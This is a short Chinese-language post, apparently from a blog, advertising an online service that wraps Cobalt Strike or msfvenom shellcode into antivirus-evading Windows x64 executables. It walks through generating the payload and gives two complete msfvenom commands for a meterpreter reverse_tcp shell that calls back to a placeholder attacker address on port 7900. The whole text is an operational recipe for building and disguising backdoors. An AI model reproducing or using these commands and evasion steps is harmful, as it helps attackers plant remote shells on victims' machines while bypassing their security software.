ShellCode在线免杀工具,只需要从cobaltstrike或msfvenom生成shellcode,填写到shellcode框内,根据需要选择一些参数,便可以在线生成免杀的可执行文件。
免杀编译生成使用的是go
语言,所以文件可能比较大,使用upx
压缩可以到500kb左右。
目前仅支持x64位的免杀。
使用教程以生成Windows可执行文件为例。
cobaltstrike 生成shellcode
生成后门 - Payload Generator
生成C语言格式,勾选上x64(免杀效果好)
保存文件后复制生成的payload.c
中所有的内容
点击生成即可。
msfvenom 生成shellcode
生成64位的payload c语言文件
msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=x.x.x.x LPORT=7900
或者直接生成hex格式(推荐)
msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=x.x.x.x LPORT=7900
复制payload.c文件到shellcode文本框即可
免杀能力
地址:https://i.hacking8.com/shellcode/
发表评论